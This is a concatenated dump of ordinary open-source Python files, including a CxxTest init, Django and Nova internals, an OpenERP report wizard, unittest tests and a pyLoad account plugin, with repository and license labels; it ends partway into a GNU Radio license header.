darcy0511/Dato-Core | cxxtest/python/cxxtest/__init__.py | 48 | 1301 | #-------------------------------------------------------------------------
# CxxTest: A lightweight C++ unit testing library.
# Copyright (c) 2008 Sandia Corporation.
# This software is distributed under the LGPL License v2.1
# For more information, see the COPYING file in the top CxxTest directory.
# Under the terms of Contract DE-AC04-94AL85000 with Sandia Corporation,
# the U.S. Government retains certain rights in this software.
#-------------------------------------------------------------------------
"""cxxtest: A Python package that supports the CxxTest test framework for C/C++.
.. _CxxTest: http://cxxtest.tigris.org/
CxxTest is a unit testing framework for C++ that is similar in
spirit to JUnit, CppUnit, and xUnit. CxxTest is easy to use because
it does not require precompiling a CxxTest testing library, it
employs no advanced features of C++ (e.g. RTTI) and it supports a
very flexible form of test discovery.
The cxxtest Python package includes capabilities for parsing C/C++ source files and generating
CxxTest drivers.
"""
# Re-export the package's version metadata.
from cxxtest.__release__ import __version__, __date__
# Bare name references -- no runtime effect; presumably kept to stop
# static checkers flagging the two imports above as unused re-exports.
__date__
__version__
__maintainer__ = "William E. Hart"
__maintainer_email__ = "whart222@gmail.com"
__license__ = "LGPL"
__url__ = "http://cxxtest.tigris.org/"
# Pull the code-generator entry points into the package namespace.
from cxxtest.cxxtestgen import *
| agpl-3.0 |
pyemma/scalable-python-app | Lesson_4/00_Conference_Central/utils.py | 384 | 1576 | import json
import os
import time
import uuid
from google.appengine.api import urlfetch
from models import Profile
def getUserId(user, id_type="email"):
    """Return a unique identifier string for an App Engine user.

    :param user: a ``google.appengine.api.users.User`` object.
    :param id_type: how to derive the identifier --
        "email": the user's e-mail address (default);
        "oauth": the OAuth2 user id looked up from Google's tokeninfo
            endpoint ('' if the lookup fails after retries);
        "custom": the id of the matching Profile entity, or a freshly
            generated uuid1 hex string if no profile exists.
    """
    if id_type == "email":
        return user.email()
    if id_type == "oauth":
        """A workaround implementation for getting userid."""
        # Pull the bearer token straight from the WSGI environment.
        auth = os.getenv('HTTP_AUTHORIZATION')
        bearer, token = auth.split()
        token_type = 'id_token'
        if 'OAUTH_USER_ID' in os.environ:
            token_type = 'access_token'
        url = ('https://www.googleapis.com/oauth2/v1/tokeninfo?%s=%s'
               % (token_type, token))
        user = {}
        wait = 1
        # Up to three attempts with a growing back-off between retries.
        for i in range(3):
            resp = urlfetch.fetch(url)
            if resp.status_code == 200:
                user = json.loads(resp.content)
                break
            elif resp.status_code == 400 and 'invalid_token' in resp.content:
                # Token was not an id_token; retry as an access_token.
                url = ('https://www.googleapis.com/oauth2/v1/tokeninfo?%s=%s'
                       % ('access_token', token))
            else:
                time.sleep(wait)
                wait = wait + i
        return user.get('user_id', '')
    if id_type == "custom":
        # implement your own user_id creation and getting algorythm
        # this is just a sample that queries datastore for an existing profile
        # and generates an id if profile does not exist for an email
        # Bug fix: the original referenced the undefined name `Conference`
        # (only `Profile` is imported here) and called .id() on a Query
        # object, so this branch always raised at runtime.
        profile = Profile.query(Profile.mainEmail == user.email()).get()
        if profile:
            # NOTE(review): assumes Profile entities are keyed by the
            # generated id -- confirm against the model definition.
            return str(profile.key.id())
        else:
            return str(uuid.uuid1().get_hex())
| gpl-3.0 |
duyetdev/openerp-6.1.1 | openerp/addons/account/wizard/account_report_common.py | 7 | 9111 | # -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2010 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
import time
from lxml import etree
from osv import fields, osv
from tools.translate import _
class account_common_report(osv.osv_memory):
    """Abstract wizard holding the filter fields (chart of accounts,
    fiscal year, period/date range, journals, target moves) shared by
    the accounting report wizards that inherit from it."""
    _name = "account.common.report"
    _description = "Account Common Report"
def onchange_chart_id(self, cr, uid, ids, chart_account_id=False, context=None):
if chart_account_id:
company_id = self.pool.get('account.account').browse(cr, uid, chart_account_id, context=context).company_id.id
return {'value': {'company_id': company_id}}
_columns = {
'chart_account_id': fields.many2one('account.account', 'Chart of Account', help='Select Charts of Accounts', required=True, domain = [('parent_id','=',False)]),
'company_id': fields.related('chart_account_id', 'company_id', type='many2one', relation='res.company', string='Company', readonly=True),
'fiscalyear_id': fields.many2one('account.fiscalyear', 'Fiscal Year', help='Keep empty for all open fiscal year'),
'filter': fields.selection([('filter_no', 'No Filters'), ('filter_date', 'Date'), ('filter_period', 'Periods')], "Filter by", required=True),
'period_from': fields.many2one('account.period', 'Start Period'),
'period_to': fields.many2one('account.period', 'End Period'),
'journal_ids': fields.many2many('account.journal', string='Journals', required=True),
'date_from': fields.date("Start Date"),
'date_to': fields.date("End Date"),
'target_move': fields.selection([('posted', 'All Posted Entries'),
('all', 'All Entries'),
], 'Target Moves', required=True),
}
def _check_company_id(self, cr, uid, ids, context=None):
for wiz in self.browse(cr, uid, ids, context=context):
company_id = wiz.company_id.id
if wiz.fiscalyear_id and company_id != wiz.fiscalyear_id.company_id.id:
return False
if wiz.period_from and company_id != wiz.period_from.company_id.id:
return False
if wiz.period_to and company_id != wiz.period_to.company_id.id:
return False
return True
_constraints = [
(_check_company_id, 'The fiscalyear, periods or chart of account chosen have to belong to the same company.', ['chart_account_id','fiscalyear_id','period_from','period_to']),
]
def fields_view_get(self, cr, uid, view_id=None, view_type='form', context=None, toolbar=False, submenu=False):
res = super(account_common_report, self).fields_view_get(cr, uid, view_id=view_id, view_type=view_type, context=context, toolbar=toolbar, submenu=False)
if context.get('active_model', False) == 'account.account' and view_id:
doc = etree.XML(res['arch'])
nodes = doc.xpath("//field[@name='chart_account_id']")
for node in nodes:
node.set('readonly', '1')
node.set('help', 'If you print the report from Account list/form view it will not consider Charts of account')
res['arch'] = etree.tostring(doc)
return res
    def onchange_filter(self, cr, uid, ids, filter='filter_no', fiscalyear_id=False, context=None):
        """Reset the date/period fields whenever the 'filter' selection changes.

        - 'filter_no':     clear both the date range and the period range.
        - 'filter_date':   preset the date range to [Jan 1st .. today].
        - 'filter_period': preset the period range to the fiscal year's first
          non-special period and its latest already-started period.

        Returns an onchange-style dict: {'value': {field: new_value, ...}}.
        """
        res = {'value': {}}
        if filter == 'filter_no':
            res['value'] = {'period_from': False, 'period_to': False, 'date_from': False ,'date_to': False}
        if filter == 'filter_date':
            res['value'] = {'period_from': False, 'period_to': False, 'date_from': time.strftime('%Y-01-01'), 'date_to': time.strftime('%Y-%m-%d')}
        if filter == 'filter_period' and fiscalyear_id:
            start_period = end_period = False
            # Single round-trip: the first half of the UNION picks the fiscal
            # year's earliest non-special period, the second half picks the
            # last period that has already started (date_start < NOW()).
            cr.execute('''
                SELECT * FROM (SELECT p.id
                               FROM account_period p
                               LEFT JOIN account_fiscalyear f ON (p.fiscalyear_id = f.id)
                               WHERE f.id = %s
                               AND p.special = false
                               ORDER BY p.date_start ASC, p.special ASC
                               LIMIT 1) AS period_start
                UNION ALL
                SELECT * FROM (SELECT p.id
                               FROM account_period p
                               LEFT JOIN account_fiscalyear f ON (p.fiscalyear_id = f.id)
                               WHERE f.id = %s
                               AND p.date_start < NOW()
                               AND p.special = false
                               ORDER BY p.date_stop DESC
                               LIMIT 1) AS period_stop''', (fiscalyear_id, fiscalyear_id))
            periods = [i[0] for i in cr.fetchall()]
            # Only fill the bounds if both rows came back (a fiscal year with
            # no started period yields a single row).
            if periods and len(periods) > 1:
                start_period = periods[0]
                end_period = periods[1]
            res['value'] = {'period_from': start_period, 'period_to': end_period, 'date_from': False, 'date_to': False}
        return res
def _get_account(self, cr, uid, context=None):
accounts = self.pool.get('account.account').search(cr, uid, [('parent_id', '=', False)], limit=1)
return accounts and accounts[0] or False
def _get_fiscalyear(self, cr, uid, context=None):
now = time.strftime('%Y-%m-%d')
fiscalyears = self.pool.get('account.fiscalyear').search(cr, uid, [('date_start', '<', now), ('date_stop', '>', now)], limit=1 )
return fiscalyears and fiscalyears[0] or False
def _get_all_journal(self, cr, uid, context=None):
return self.pool.get('account.journal').search(cr, uid ,[])
_defaults = {
'fiscalyear_id': _get_fiscalyear,
'company_id': lambda self,cr,uid,c: self.pool.get('res.company')._company_default_get(cr, uid, 'account.common.report',context=c),
'journal_ids': _get_all_journal,
'filter': 'filter_no',
'chart_account_id': _get_account,
'target_move': 'posted',
}
def _build_contexts(self, cr, uid, ids, data, context=None):
if context is None:
context = {}
result = {}
result['fiscalyear'] = 'fiscalyear_id' in data['form'] and data['form']['fiscalyear_id'] or False
result['journal_ids'] = 'journal_ids' in data['form'] and data['form']['journal_ids'] or False
result['chart_account_id'] = 'chart_account_id' in data['form'] and data['form']['chart_account_id'] or False
if data['form']['filter'] == 'filter_date':
result['date_from'] = data['form']['date_from']
result['date_to'] = data['form']['date_to']
elif data['form']['filter'] == 'filter_period':
if not data['form']['period_from'] or not data['form']['period_to']:
raise osv.except_osv(_('Error'),_('Select a starting and an ending period'))
result['period_from'] = data['form']['period_from']
result['period_to'] = data['form']['period_to']
return result
def _print_report(self, cr, uid, ids, data, context=None):
raise (_('Error'), _('not implemented'))
def check_report(self, cr, uid, ids, context=None):
if context is None:
context = {}
data = {}
data['ids'] = context.get('active_ids', [])
data['model'] = context.get('active_model', 'ir.ui.menu')
data['form'] = self.read(cr, uid, ids, ['date_from', 'date_to', 'fiscalyear_id', 'journal_ids', 'period_from', 'period_to', 'filter', 'chart_account_id', 'target_move'], context=context)[0]
for field in ['fiscalyear_id', 'chart_account_id', 'period_from', 'period_to']:
if isinstance(data['form'][field], tuple):
data['form'][field] = data['form'][field][0]
used_context = self._build_contexts(cr, uid, ids, data, context=context)
data['form']['periods'] = used_context.get('periods', False) and used_context['periods'] or []
data['form']['used_context'] = used_context
return self._print_report(cr, uid, ids, data, context=context)
# Instantiating the osv class registers it in the ORM (pre-OpenERP 6.1 idiom).
account_common_report()
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
| agpl-3.0 |
SYSTRAN/geographic-api-python-client | systran_geographic_api/models/review.py | 1 | 1996 | #!/usr/bin/env python
# coding: utf-8
"""
Copyright 2015 SYSTRAN Software, Inc. All rights reserved.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
class Review(object):
    """
    NOTE: This class is auto generated by the systran code generator program.
    Do not edit the class manually.
    """
    def __init__(self):
        """
        Systran model
        :param dict systran_types: The key is attribute name and the value is attribute type.
        :param dict attribute_map: The key is attribute name and the value is json key in definition.
        """
        self.systran_types = {
            'text': 'str',
            'language': 'str',
            'author': 'str',
            'rating': 'int'
        }

        self.attribute_map = {
            'text': 'text',
            'language': 'language',
            'author': 'author',
            'rating': 'rating'
        }

        # Text
        self.text = None  # str
        # Language
        self.language = None  # str
        # Author
        self.author = None  # str
        # Rating (from 1 to 5)
        self.rating = None  # int

    def __repr__(self):
        """Return a debug representation listing the model's data fields.

        Bug fix: the original interpolated ``__name__`` (the *module* name)
        into the output; a repr is expected to show the *class* name.
        """
        properties = []
        for p in self.__dict__:
            # Skip the two bookkeeping dicts; only data fields are shown.
            if p != 'systran_types' and p != 'attribute_map':
                properties.append('{prop}={val!r}'.format(prop=p, val=self.__dict__[p]))

        return '<{name} {props}>'.format(name=type(self).__name__, props=' '.join(properties))
| apache-2.0 |
2014c2g5/2014c2 | exts/w2/static/Brython2.0.0-20140209-164925/Lib/unittest/test/test_functiontestcase.py | 791 | 5478 | import unittest
from .support import LoggingResult
class Test_FunctionTestCase(unittest.TestCase):

    def _run_case(self, log, test, setUp=None, tearDown=None):
        # Build a FunctionTestCase from the given callables and run it
        # against a LoggingResult that appends every event name to `log`.
        unittest.FunctionTestCase(test, setUp, tearDown).run(LoggingResult(log))

    # A FunctionTestCase always represents exactly one test.
    def test_countTestCases(self):
        case = unittest.FunctionTestCase(lambda: None)
        self.assertEqual(case.countTestCases(), 1)

    # If setUp() blows up, the test body and tearDown() are skipped and the
    # problem is reported as an error.
    def test_run_call_order__error_in_setUp(self):
        log = []

        def setUp():
            log.append('setUp')
            raise RuntimeError('raised by setUp')

        def test():
            log.append('test')

        def tearDown():
            log.append('tearDown')

        self._run_case(log, test, setUp, tearDown)
        self.assertEqual(log, ['startTest', 'setUp', 'addError', 'stopTest'])

    # An exception raised by the test body is recorded as an error, and
    # tearDown() still runs afterwards.
    def test_run_call_order__error_in_test(self):
        log = []

        def setUp():
            log.append('setUp')

        def test():
            log.append('test')
            raise RuntimeError('raised by test')

        def tearDown():
            log.append('tearDown')

        self._run_case(log, test, setUp, tearDown)
        self.assertEqual(log, ['startTest', 'setUp', 'test', 'tearDown',
                               'addError', 'stopTest'])

    # A failed assertion in the test body is recorded as a failure (not an
    # error), and tearDown() still runs afterwards.
    def test_run_call_order__failure_in_test(self):
        log = []

        def setUp():
            log.append('setUp')

        def test():
            log.append('test')
            self.fail('raised by test')

        def tearDown():
            log.append('tearDown')

        self._run_case(log, test, setUp, tearDown)
        self.assertEqual(log, ['startTest', 'setUp', 'test', 'tearDown',
                               'addFailure', 'stopTest'])

    # An exception raised by tearDown() is recorded as an error.
    def test_run_call_order__error_in_tearDown(self):
        log = []

        def setUp():
            log.append('setUp')

        def test():
            log.append('test')

        def tearDown():
            log.append('tearDown')
            raise RuntimeError('raised by tearDown')

        self._run_case(log, test, setUp, tearDown)
        self.assertEqual(log, ['startTest', 'setUp', 'test', 'tearDown',
                               'addError', 'stopTest'])

    # The docs only promise that id() is a string; assert no more than that.
    def test_id(self):
        case = unittest.FunctionTestCase(lambda: None)
        self.assertIsInstance(case.id(), str)

    # With no docstring and no explicit description there is nothing to
    # describe, so shortDescription() returns None.
    def test_shortDescription__no_docstring(self):
        case = unittest.FunctionTestCase(lambda: None)
        self.assertEqual(case.shortDescription(), None)

    # An explicit one-line description is returned verbatim.
    def test_shortDescription__singleline_docstring(self):
        case = unittest.FunctionTestCase(lambda: None,
                                         description="this tests foo")
        self.assertEqual(case.shortDescription(), "this tests foo")
| gpl-2.0 |
OndrejIT/pyload | module/plugins/accounts/RapiduNet.py | 8 | 1914 | # -*- coding: utf-8 -*-
import re
import time
from ..internal.Account import Account
from ..internal.misc import json
class RapiduNet(Account):
    __name__ = "RapiduNet"
    __type__ = "account"
    __version__ = "0.12"
    __status__ = "testing"

    __description__ = """Rapidu.net account plugin"""
    __license__ = "GPLv3"
    __authors__ = [("prOq", None),
                   ("Walter Purcaro", "vuolter@gmail.com")]

    PREMIUM_PATTERN = r'>Account: <b>Premium'
    VALID_UNTIL_PATTERN = r'>Account: <b>\w+ \((\d+)'
    TRAFFIC_LEFT_PATTERN = r'class="tipsyS"><b>([\d.,]+)\s*([\w^_]*)<'

    def grab_info(self, user, password, data):
        """Scrape account status (premium flag, expiry, traffic left) from
        the rapidu.net landing page."""
        html = self.load("https://rapidu.net/")

        premium = re.search(self.PREMIUM_PATTERN, html) is not None

        validuntil = None
        expiry = re.search(self.VALID_UNTIL_PATTERN, html)
        if expiry is not None:
            # The page shows the number of days remaining.
            validuntil = time.time() + (86400 * int(expiry.group(1)))

        trafficleft = -1
        traffic = re.search(self.TRAFFIC_LEFT_PATTERN, html)
        if traffic is not None:
            trafficleft = self.parse_traffic(traffic.group(1), traffic.group(2))

        return {'validuntil': validuntil,
                'trafficleft': trafficleft,
                'premium': premium}

    def signin(self, user, password, data):
        """Log in through the site's AJAX endpoint; fail on any reply that
        is not 'success'."""
        # Force the interface language to English first.
        self.load("https://rapidu.net/ajax.php",
                  get={'a': "getChangeLang"},
                  post={'_go': "",
                        'lang': "en"})

        response = self.load("https://rapidu.net/ajax.php",
                             get={'a': "getUserLogin"},
                             post={'_go': "",
                                   'login': user,
                                   'pass': password,
                                   'remember': "1"})

        reply = json.loads(response)
        self.log_debug(reply)

        if reply['message'] != "success":
            self.fail_login()
| gpl-3.0 |
megaumi/django | django/db/backends/postgresql/introspection.py | 326 | 10060 | from __future__ import unicode_literals
from collections import namedtuple
from django.db.backends.base.introspection import (
BaseDatabaseIntrospection, FieldInfo, TableInfo,
)
from django.utils.encoding import force_text
# Extend the base FieldInfo tuple with the column default, which PostgreSQL
# introspection needs in order to detect serial (AutoField) columns.
FieldInfo = namedtuple('FieldInfo', FieldInfo._fields + ('default',))
class DatabaseIntrospection(BaseDatabaseIntrospection):
    """PostgreSQL implementation of database introspection, built on the
    pg_catalog system tables and information_schema views."""

    # Maps type codes to Django Field types.
    data_types_reverse = {
        16: 'BooleanField',
        17: 'BinaryField',
        20: 'BigIntegerField',
        21: 'SmallIntegerField',
        23: 'IntegerField',
        25: 'TextField',
        700: 'FloatField',
        701: 'FloatField',
        869: 'GenericIPAddressField',
        1042: 'CharField', # blank-padded
        1043: 'CharField',
        1082: 'DateField',
        1083: 'TimeField',
        1114: 'DateTimeField',
        1184: 'DateTimeField',
        1266: 'TimeField',
        1700: 'DecimalField',
    }

    ignored_tables = []

    # Single-column index lookup; indkey[0] restricts the attribute join to
    # the index's first field (multi-column indexes are filtered out later).
    _get_indexes_query = """
        SELECT attr.attname, idx.indkey, idx.indisunique, idx.indisprimary
        FROM pg_catalog.pg_class c, pg_catalog.pg_class c2,
            pg_catalog.pg_index idx, pg_catalog.pg_attribute attr
        WHERE c.oid = idx.indrelid
            AND idx.indexrelid = c2.oid
            AND attr.attrelid = c.oid
            AND attr.attnum = idx.indkey[0]
            AND c.relname = %s"""

    def get_field_type(self, data_type, description):
        # A serial column shows up as an integer whose default is a
        # nextval(...) call; report it as an AutoField instead.
        field_type = super(DatabaseIntrospection, self).get_field_type(data_type, description)
        if field_type == 'IntegerField' and description.default and 'nextval' in description.default:
            return 'AutoField'
        return field_type

    def get_table_list(self, cursor):
        """
        Returns a list of table and view names in the current database.
        """
        cursor.execute("""
            SELECT c.relname, c.relkind
            FROM pg_catalog.pg_class c
            LEFT JOIN pg_catalog.pg_namespace n ON n.oid = c.relnamespace
            WHERE c.relkind IN ('r', 'v')
                AND n.nspname NOT IN ('pg_catalog', 'pg_toast')
                AND pg_catalog.pg_table_is_visible(c.oid)""")
        # relkind 'r' = ordinary table, 'v' = view.
        return [TableInfo(row[0], {'r': 't', 'v': 'v'}.get(row[1]))
                for row in cursor.fetchall()
                if row[0] not in self.ignored_tables]

    def get_table_description(self, cursor, table_name):
        "Returns a description of the table, with the DB-API cursor.description interface."
        # As cursor.description does not return reliably the nullable property,
        # we have to query the information_schema (#7783)
        cursor.execute("""
            SELECT column_name, is_nullable, column_default
            FROM information_schema.columns
            WHERE table_name = %s""", [table_name])
        field_map = {line[0]: line[1:] for line in cursor.fetchall()}
        # LIMIT 1 is only needed to populate cursor.description cheaply.
        cursor.execute("SELECT * FROM %s LIMIT 1" % self.connection.ops.quote_name(table_name))
        return [FieldInfo(*((force_text(line[0]),) + line[1:6]
                            + (field_map[force_text(line[0])][0] == 'YES', field_map[force_text(line[0])][1])))
                for line in cursor.description]

    def get_relations(self, cursor, table_name):
        """
        Returns a dictionary of {field_name: (field_name_other_table, other_table)}
        representing all relationships to the given table.
        """
        # contype 'f' = foreign-key constraint; conkey/confkey hold the
        # (1-based) column numbers on each side of the relation.
        cursor.execute("""
            SELECT c2.relname, a1.attname, a2.attname
            FROM pg_constraint con
            LEFT JOIN pg_class c1 ON con.conrelid = c1.oid
            LEFT JOIN pg_class c2 ON con.confrelid = c2.oid
            LEFT JOIN pg_attribute a1 ON c1.oid = a1.attrelid AND a1.attnum = con.conkey[1]
            LEFT JOIN pg_attribute a2 ON c2.oid = a2.attrelid AND a2.attnum = con.confkey[1]
            WHERE c1.relname = %s
                AND con.contype = 'f'""", [table_name])
        relations = {}
        for row in cursor.fetchall():
            relations[row[1]] = (row[2], row[0])
        return relations

    def get_key_columns(self, cursor, table_name):
        # Returns (column, referenced_table, referenced_column) triples for
        # every foreign key declared on the given table.
        key_columns = []
        cursor.execute("""
            SELECT kcu.column_name, ccu.table_name AS referenced_table, ccu.column_name AS referenced_column
            FROM information_schema.constraint_column_usage ccu
            LEFT JOIN information_schema.key_column_usage kcu
                ON ccu.constraint_catalog = kcu.constraint_catalog
                    AND ccu.constraint_schema = kcu.constraint_schema
                    AND ccu.constraint_name = kcu.constraint_name
            LEFT JOIN information_schema.table_constraints tc
                ON ccu.constraint_catalog = tc.constraint_catalog
                    AND ccu.constraint_schema = tc.constraint_schema
                    AND ccu.constraint_name = tc.constraint_name
            WHERE kcu.table_name = %s AND tc.constraint_type = 'FOREIGN KEY'""", [table_name])
        key_columns.extend(cursor.fetchall())
        return key_columns

    def get_indexes(self, cursor, table_name):
        # This query retrieves each index on the given table, including the
        # first associated field name
        cursor.execute(self._get_indexes_query, [table_name])
        indexes = {}
        for row in cursor.fetchall():
            # row[1] (idx.indkey) is stored in the DB as an array. It comes out as
            # a string of space-separated integers. This designates the field
            # indexes (1-based) of the fields that have indexes on the table.
            # Here, we skip any indexes across multiple fields.
            if ' ' in row[1]:
                continue
            if row[0] not in indexes:
                indexes[row[0]] = {'primary_key': False, 'unique': False}
            # It's possible to have the unique and PK constraints in separate indexes.
            if row[3]:
                indexes[row[0]]['primary_key'] = True
            if row[2]:
                indexes[row[0]]['unique'] = True
        return indexes

    def get_constraints(self, cursor, table_name):
        """
        Retrieves any constraints or keys (unique, pk, fk, check, index) across one or more columns.
        """
        constraints = {}
        # Loop over the key table, collecting things as constraints
        # This will get PKs, FKs, and uniques, but not CHECK
        cursor.execute("""
            SELECT
                kc.constraint_name,
                kc.column_name,
                c.constraint_type,
                array(SELECT table_name::text || '.' || column_name::text
                      FROM information_schema.constraint_column_usage
                      WHERE constraint_name = kc.constraint_name)
            FROM information_schema.key_column_usage AS kc
            JOIN information_schema.table_constraints AS c ON
                kc.table_schema = c.table_schema AND
                kc.table_name = c.table_name AND
                kc.constraint_name = c.constraint_name
            WHERE
                kc.table_schema = %s AND
                kc.table_name = %s
            ORDER BY kc.ordinal_position ASC
        """, ["public", table_name])
        for constraint, column, kind, used_cols in cursor.fetchall():
            # If we're the first column, make the record
            if constraint not in constraints:
                constraints[constraint] = {
                    "columns": [],
                    "primary_key": kind.lower() == "primary key",
                    "unique": kind.lower() in ["primary key", "unique"],
                    "foreign_key": tuple(used_cols[0].split(".", 1)) if kind.lower() == "foreign key" else None,
                    "check": False,
                    "index": False,
                }
            # Record the details
            constraints[constraint]['columns'].append(column)
        # Now get CHECK constraint columns
        cursor.execute("""
            SELECT kc.constraint_name, kc.column_name
            FROM information_schema.constraint_column_usage AS kc
            JOIN information_schema.table_constraints AS c ON
                kc.table_schema = c.table_schema AND
                kc.table_name = c.table_name AND
                kc.constraint_name = c.constraint_name
            WHERE
                c.constraint_type = 'CHECK' AND
                kc.table_schema = %s AND
                kc.table_name = %s
        """, ["public", table_name])
        for constraint, column in cursor.fetchall():
            # If we're the first column, make the record
            if constraint not in constraints:
                constraints[constraint] = {
                    "columns": [],
                    "primary_key": False,
                    "unique": False,
                    "foreign_key": None,
                    "check": True,
                    "index": False,
                }
            # Record the details
            constraints[constraint]['columns'].append(column)
        # Now get indexes
        cursor.execute("""
            SELECT
                c2.relname,
                ARRAY(
                    SELECT (SELECT attname FROM pg_catalog.pg_attribute WHERE attnum = i AND attrelid = c.oid)
                    FROM unnest(idx.indkey) i
                ),
                idx.indisunique,
                idx.indisprimary
            FROM pg_catalog.pg_class c, pg_catalog.pg_class c2,
                pg_catalog.pg_index idx
            WHERE c.oid = idx.indrelid
                AND idx.indexrelid = c2.oid
                AND c.relname = %s
        """, [table_name])
        for index, columns, unique, primary in cursor.fetchall():
            if index not in constraints:
                constraints[index] = {
                    "columns": list(columns),
                    "primary_key": primary,
                    "unique": unique,
                    "foreign_key": None,
                    "check": False,
                    "index": True,
                }
        return constraints
| bsd-3-clause |
pch957/python-bts-v0.9 | bts/misc.py | 1 | 1309 | # -*- coding: utf-8 -*-
import re
def _to_fixed_point(match):
"""Return the fixed point form of the matched number.
Parameters:
match is a MatchObject that matches exp_regex or similar.
If you wish to make match using your own regex, keep the following in mind:
group 1 should be the coefficient
group 3 should be the sign
group 4 should be the exponent
"""
sign = -1 if match.group(3) == "-" else 1
coefficient = float(match.group(1))
exponent = sign * float(match.group(4))
if exponent <= 0:
format_str = "%." + "%d" % (-exponent + len(match.group(1)) - 2) + "f"
else:
format_str = "%.1f"
return format_str % (coefficient * 10 ** exponent)
def to_fixed_point(string):
    """Rewrite every signed scientific-notation number found in *string*
    as its fixed point equivalent; everything else passes through."""
    return re.sub(r"(\d+(\.\d+)?)[Ee](\+|-)(\d+)", _to_fixed_point, str(string))
def trim_float_precision(number, precision):
    """Format *number* keeping one decimal place per trailing zero of
    *precision* (e.g. precision=1000 -> 3 decimal places)."""
    decimals = len(str(int(precision))) - 1
    return ("%%.%df" % decimals) % number
def get_median(prices):
    """Median of an already-sorted sequence of prices; None when empty.

    For an even number of elements the two middle values are averaged.
    """
    if not prices:
        return None
    half, odd = divmod(len(prices), 2)
    if odd:
        return prices[half]
    return float(prices[half - 1] + prices[half]) / 2
| mit |
SujaySKumar/django | django/db/models/__init__.py | 239 | 1679 | from functools import wraps
from django.core.exceptions import ObjectDoesNotExist # NOQA
from django.db.models import signals # NOQA
from django.db.models.aggregates import * # NOQA
from django.db.models.deletion import ( # NOQA
CASCADE, DO_NOTHING, PROTECT, SET, SET_DEFAULT, SET_NULL, ProtectedError,
)
from django.db.models.expressions import ( # NOQA
F, Case, Expression, ExpressionWrapper, Func, Value, When,
)
from django.db.models.fields import * # NOQA
from django.db.models.fields.files import FileField, ImageField # NOQA
from django.db.models.fields.proxy import OrderWrt # NOQA
from django.db.models.fields.subclassing import SubfieldBase # NOQA
from django.db.models.lookups import Lookup, Transform # NOQA
from django.db.models.manager import Manager # NOQA
from django.db.models.query import Q, Prefetch, QuerySet # NOQA
# Imports that would create circular imports if sorted
from django.db.models.base import Model # NOQA isort:skip
from django.db.models.fields.related import ( # NOQA isort:skip
ForeignKey, ForeignObject, OneToOneField, ManyToManyField,
ManyToOneRel, ManyToManyRel, OneToOneRel,
)
def permalink(func):
    """
    Decorator that calls urlresolvers.reverse() to return a URL using
    parameters returned by the decorated function "func".

    "func" should be a function that returns a tuple in one of the
    following formats:
        (viewname, viewargs)
        (viewname, viewargs, viewkwargs)
    """
    from django.core.urlresolvers import reverse

    @wraps(func)
    def wrapper(*args, **kwargs):
        view_bits = func(*args, **kwargs)
        # bits[1:3] covers both the 2-tuple and the 3-tuple forms.
        return reverse(view_bits[0], None, *view_bits[1:3])
    return wrapper
| bsd-3-clause |
JianyuWang/nova | nova/debugger.py | 28 | 3067 | # Copyright 2010 United States Government as represented by the
# Administrator of the National Aeronautics and Space Administration.
# Copyright 2011 Justin Santa Barbara
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
# NOTE(markmc): this is imported before monkey patching in nova.cmd
# so we avoid extra imports here
import sys
def enabled():
    """Report whether both remote-debug CLI flags were passed on argv."""
    required = ('--remote_debug-host', '--remote_debug-port')
    return all(flag in sys.argv for flag in required)
def register_cli_opts():
    """Register the remote_debug host/port options on the global config.

    oslo.config is imported lazily so it is only required when remote
    debugging is actually configured.
    """
    from oslo_config import cfg

    # Shared tail of both help texts; the concatenated strings are
    # identical to the historical wording.
    risk_note = ('Note that using the remote debug option changes how '
                 'Nova uses the eventlet library to support async IO. '
                 'This could result in failures that do not occur '
                 'under normal operation. Use at your own risk.')

    cli_opts = [
        cfg.StrOpt('host',
                   help='Debug host (IP or name) to connect. ' + risk_note),
        cfg.IntOpt('port',
                   min=1,
                   max=65535,
                   help='Debug port to connect. ' + risk_note),
    ]

    cfg.CONF.register_cli_opts(cli_opts, 'remote_debug')
def init():
    """Attach this process to a remote pydev debugger when both the
    remote_debug host and port options are configured; no-op otherwise."""
    from oslo_config import cfg
    CONF = cfg.CONF

    # NOTE(markmc): gracefully handle the CLI options not being registered;
    # the 'in' test must run first so the attribute access below is safe.
    if ('remote_debug' not in CONF or
            not (CONF.remote_debug.host and CONF.remote_debug.port)):
        return

    import logging
    from nova.i18n import _LW
    log = logging.getLogger(__name__)

    log.debug('Listening on %(host)s:%(port)s for debug connection',
              {'host': CONF.remote_debug.host,
               'port': CONF.remote_debug.port})

    # pydevd moved between releases; try the packaged location first.
    try:
        from pydev import pydevd
    except ImportError:
        import pydevd

    pydevd.settrace(host=CONF.remote_debug.host,
                    port=CONF.remote_debug.port,
                    stdoutToServer=False,
                    stderrToServer=False)

    log.warning(_LW('WARNING: Using the remote debug option changes how '
                    'Nova uses the eventlet library to support async IO. This '
                    'could result in failures that do not occur under normal '
                    'operation. Use at your own risk.'))
| apache-2.0 |
jasimpson/gnuradio-jasimpson | gnuradio-examples/python/ofdm/benchmark_ofdm_tx.py | 10 | 7987 | #!/usr/bin/env python
#
# Copyright 2005, 2006 Free Software Foundation, Inc.
#
# This file is part of GNU Radio
#
# GNU Radio is free software; you can redistribute it and/or modify
